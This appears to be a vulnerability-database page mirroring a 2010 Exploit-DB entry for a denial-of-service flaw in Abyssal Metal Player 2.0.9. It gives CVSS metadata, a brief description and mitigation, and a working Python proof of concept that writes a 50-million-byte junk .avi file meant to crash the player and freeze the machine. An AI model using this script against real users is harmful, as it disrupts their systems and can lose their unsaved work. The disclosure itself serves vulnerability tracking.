header-logo
Suggest Exploit
vendor:
Abyssal Metal Player
by:
41.w4r10r
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Abyssal Metal Player
Affected Version From: 2.0.9
Affected Version To: 2.0.9
Patch Exists: NO
Related CWE: N/A
CPE: a:abyssalsoft:abyssal_metal_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2 Eng
2010

Abyssal Metal Player 2.0.9 DoS

Abyssal Metal Player is Media File Player which Plays many Media Files such as .Mp3 , .avi, .mov, .mpg, .wav. This vulnerability is found in playing avi file format. An attacker can create a malicious avi file with a large amount of data and when the user opens the file in the player, the application will crash and the user will not be able to use the system until it is restarted.

Mitigation:

The user should not open any suspicious files from untrusted sources.
Source

Exploit-DB raw data:

# Exploit Title: Abyssal Metal Player 2.0.9 DoS
# Date: 23/08/2010
# Author: 41.w4r10r
# Version: 2.0.9

#Tested on : Windows XP SP2 Eng
# Software Link: http://www.abyssalsoft.com/files/download.php?id=15

#!/usr/bin/python
#Abyssal Metal Player is Media File Player which Plays many Media Files such as .Mp3 , .avi, .mov, .mpg, .wav.
# This vulnerability is found in playing avi file format.
print "--------------------Exploit By 41.w4r10r------------------------------\n"
print "-------------------41.w4r10r@gmail.com-----------------------------\n"
print "----------------Abyssal Metal Player 2.0.9------------------------------\n"
print "-------------Vendor Site : www.abyssalsoft.com-------------------------\n"
print "-------------Tested on Windows XP Sp2 Eng--------------------\n"
print "Greets:B0nd, nEo, Godwin_Austin, Fb1H2s, Eberly, Punter, The_Empty(), DZZ, Micr0 \n \n"
print "  Catch Us :  www.Garahe4hackers.com | www.Andhrahackers.com | www.ICW.in \n \n"

print "Give Me 10Sec To create file :) \n"
junk = "A" * 50000000;
filename = "GetDoSed.avi";
file = open(filename,"w")
file.writelines(junk)
file.close()
print "File Is created"
print "open file in player then press ok when asked now even ctrl+alt+del will not work"
print "Recomandation : Save all working Data b4 launching exploit :P"
print "Press Any Key To Continue........."

raw_input()

Navigation

Suggest Exploit

Services By CQR